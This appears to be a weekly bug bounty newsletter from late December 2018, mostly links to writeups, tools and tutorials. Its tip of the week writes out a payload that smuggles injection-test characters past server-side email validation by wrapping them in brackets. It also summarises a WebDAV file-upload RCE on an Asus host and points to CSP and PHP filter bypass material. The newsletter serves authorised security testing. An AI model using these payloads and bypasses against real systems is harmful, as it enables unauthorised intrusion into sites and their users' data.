Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
This issue covers the week from 21 to 28 of December.
Also, I wish you and your family a very happy new year, full of bugs, bounties, fun, health & happiness!
Our favorite 5 hacking items
1. Tip of the week
I love the technical tricks for bug hunters that @intigriti shares on Twitter. I regularly add them to the tweets collection at the end of this newsletter.
But this trick in particular blew my mind! Here’s why: Have you ever tested a login or contact form, entered a valid email address, intercepted the request with Burp, then replaced the email with XSS/SQLi/SSTI/RCE detection payloads? This is a way to bypass client-side validation of the email field. So what do you do if you get an “invalid email” response from the server?
To me, its was the end of testing for input validation on that field because the check is done server-side.
But according to @securinti, you can smuggle any payload and trick the server into believing that it’s a valid email by putting the payload between round brackets: [email protected](${}<>'/"*-)domain.com or yourname(${}<>'/"*-)@domain.com.
Amazing, right? I can’t wait to re-test all forms in my bug bounty notes.
2. Writeup of the week
From Hunting for a Laptop to Hunting down Remote Code Execution
This is the writeup of a WebDAV RCE on Asus. It’s a simple but powerful vulnerability to test for if you see a 403 error page typical of Microsoft Server.
Anil Tom found one on http://stw.asus.com/ and tried to add the website as a new network location on his laptop, to see if WebDAV is enabled on the server.
It worked! So just by adding http://stw.asus.com/ as a network location, he was able to create new files on the server!
3. Resource of the week
More and more sites use the Content Security Policy especially those that have a bug bounty program. So this repo can come in very handy if you find an XSS and want to bypass CSP.
If you just want the list of payloads to bypass CSP for different sites (Google, Blogger, Uber, Yahoo, Alibaba…), check out the file Jsonp.txt.
Otherwise, you can get more information on CSP and JSONbee on the Bypassing CSP: Automated discovery of JSONP endpoints conference slides.
And you can play with csp_lab.php as a testbed to train for byassing CSP.
4. Tool of the week
PA Toolkit: Pentester Academy Wireshark Toolkit
I’ve always had trouble remembering the syntax of Wireshark filters, so this tool is a blessing.
It’s a collection of plugins that extend the functionality of Wireshark. They allow you to quickly get a list of all visited websites, downloaded files, POST/GET requests, list DNS servers, etc.
5. Tutorial of the week
I love me some good WAF/filter bypass techniques! It’s what makes a difference between being stuck in front of a WAF and finding bugs that other hunters missed even in old programs.
This is a great tutorial on how to bypass different PHP filters like: /etc/passwd, the system() function or double & single quotes (“ and ‘) being blocked. It’s worth reading & taking notes of tricks to test on your next bug hunt/pentest.
Other amazing things we stumbled upon this week
Videos
Podcasts
- The Top Ten “Application Security Podcast” Episodes of 2018
- What’s It Like to be a High-End Red Team Member? — CyberSpeak Podcast
- http://securityinfive.libsyn.com/episode-403-blur-password-manager-had-a-breach-the-reason-will-make-you-facepalm ?
- http://securityinfive.libsyn.com/episode-404-routers-with-this-feature-enabled-were-hacked-to-promote-youtube-stars-do-you-have-this-on ?
Conferences & Webcasts
- RDP Logging Bypass and Azure Active Directory Recon
- JSFoo 2018 Day 1 & JSFoo 2018 Day 2, particularly:
- From Zero to Zero Day
- Wallet.fail
Slides only
Upcoming webinars
- Live webinar: Let’s talk about XSS and React - by Jim Manico: 01/02/2019
- Career Opportunities in Information Security |by Shobha Jagathpal | WINJA Webinar: 01/03/2019
Tutorials
Medium to advanced
- A Deeper Look into XSS Payloads
- XSS with length restriction
- Edit websocket requests with Burp
- SSH Examples, Tips & Tunnels
- iOS Pentesting Tools Part 3: Frida and Objection
- Why Facebook’s api starts with a for loop
Beginners corner
- Exploiting Jenkins Groovy Script Console in Multiple Ways
- Understanding the iOS File System
- A Little Guide to SMB Enumeration
- Exploiting Put Method
- Basic XPath Injection
- Preliminary SQL Injection (Part 1)
- Preliminary SQL Injection (Part 2)
- Learn to Use CURL Command in Linux With These Examples
- Hacking Juice Shop, the DevSecOps Way
- Penetration Testing on Group Policy Preferences
- A 9-step recipe to crack a NTLMv2 Hash from a freshly acquired .pcap
- Metasploit Basics, Part 22: Exploiting and Controlling a System When You Have Physical Access
Writeups
Challenge writeups
Pentest & Responsible disclosure writeups
- Exploiting an 18 Year Old Bug
- Saving the Email Subscribers of Rentomojo
- This account has been hijacked (temporarily)!
- Twitter is Broken
This was not me tweeting. Gave my number as a Poc to someone and they proved they can hack my twitter account. Just from knowing my number. 🤦♂️🤦♂️🤦♂️ https://t.co/yNzsS5txdl
— zseano💫 (@zseano) December 26, 2018
- Case Study: Wreaking Havoc via an API
- The easiest “HACK” ever
- Kallithea <= 0.3.4 Incorrect access control and XSS
Bug bounty writeups
- Race condition on Hackerone ($2,100)
- Authorization flaw on Hackerone ($500)
- Unrestricted file upload on Hackerone
- Unrestricted file upload on private program
- IDOR on Google
- Client-side validation bypass on Netflix & Linxo
See more writeups on The list of bug bounty writeups.
Tools
If you don’t have time
- Notable: The markdown-based note-taking app that doesn’t suck
- Adhrit: Open source Android APK reversing and analysis tool that can help security researchers and CTF enthusiasts alike. The tool is an effort to cut down on the amount of time spent on reversing and basic reconnaissance of Android applications.
- Jsdir / Jspathextractor: Burp Suite extension that extracts hidden paths from js files and beautifies it
- Ipify: Public API to get your public IP & geolocation data programmatically
More tools, if you have time
- Bolt: A dumb CSRF scanner
- SerializationDumper: A tool to dump Java serialization streams in a more human readable form
- ZIP Shotgun: Utility script to test zip file upload functionality (and possible extraction of zip files) for vulnerabilities
- PoC for CVE-2018-1002105
- Pocsuite: Open-source remote vulnerability testing framework developed by the Knownsec Security Team
- L.A.S.T.: Linux Automated Security scanning Tool
- Sandmap & Tutorial: Nmap on steroids! Simple CLI with the ability to run pure Nmap engine, 31 modules with 459 scan profiles
- Netcap: A framework for secure and scalable network traffic analysis
- Marats-h1-disclosed: Hackerone hacktivity parser app. It sends notifications about new disclosed reports to your browser & The difference with existing tools
- VulnStream website & Github repo: Using Shodan’s streaming API to show a live stream of vulnerable devices as Shodan finds them
- Infoga: Email OSINT
Misc. pentest & bug bounty resources
- OWASP Internet of Things (IoT) Top 10 2018
- Inside the mind of a hacker 2019 Edition
- OSINT Resources for 2019
- Hacker Roadmap: A guide for amateurs pen testers and a collection of hacking tools, resources and references to practice ethical hacking, pen testing and web security
- How HTTPS works …in a comic!
- APIsecurity.io: Issue 13: Microsoft services and Chromecast hacks, the limitations of WAF
Articles
- The best write-ups 2018 brought us
- The Importance of the Content-Type Header in HTTP Requests
- A Review of my Bug Hunting Journey
- Swig Security Review 2018: Part I & Part II
- @EdOverflow’s answer to “What are the common features to identify XSS attack from Apache log file?”
- Publicly accessible .ENV files
Challenges
- Ctf.infosecinstitute.com: CTF with bounties
- Serverless.fail: DVSA (Damn Vulnerable Serverless Application) online & DVSA lessons
- OWASP ‘ServerlessGoat’: A Vulnerable Demo Serverless Application
News
- Sennheiser discloses monumental blunder that cripples HTTPS on PCs and Macs: TSennheiser’s HeadSetup app used a self-signed root certificate. The private key was encrypted with the passphrase “SennheiserCC” which was stored plaintext in a configuration file. Attackers could easily extract the passphrase from the binary & use it to create a valid TLS certificate for any website.
- In January, the EU starts running Bug Bounties on Free and Open Source Software
In January the European Commission is launching 14 out of a total of 15 bug bounties on Free Software projects that the EU institutions rely on
At least 61 percent of apps we tested automatically transfer data to Facebook the moment a user opens the app. This happens whether people have a Facebook account or not, or whether they are logged into Facebook or not.
It’s enough to take photos from a distance of five meters, and it might work to go to a press conference and take photos of them
Non technical
- Should I go to university?
- Automatically storing my reading backlog and other notes
- 10 Personal Finance Lessons for Technology Professionals
- Survival Tips For Women In Tech
- Social Skills For Information Security Professionals: Effective Leadership: Free book by Dawid Balut
- 2018: Top 10 biggest news stories from Linux and open source world
- 2018: The year of the data breach tsunami
- The year in #StupidSecurity
Tweeted this week
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 12/21/2018 to 12/28/2018
Have a nice week folks!
If you want to be notified when new articles (including this newsletter) are published, you can subscribe to this blog.
And if you enjoyed reading this, please consider sharing it, leaving a comment, suggestions, questions…
Comments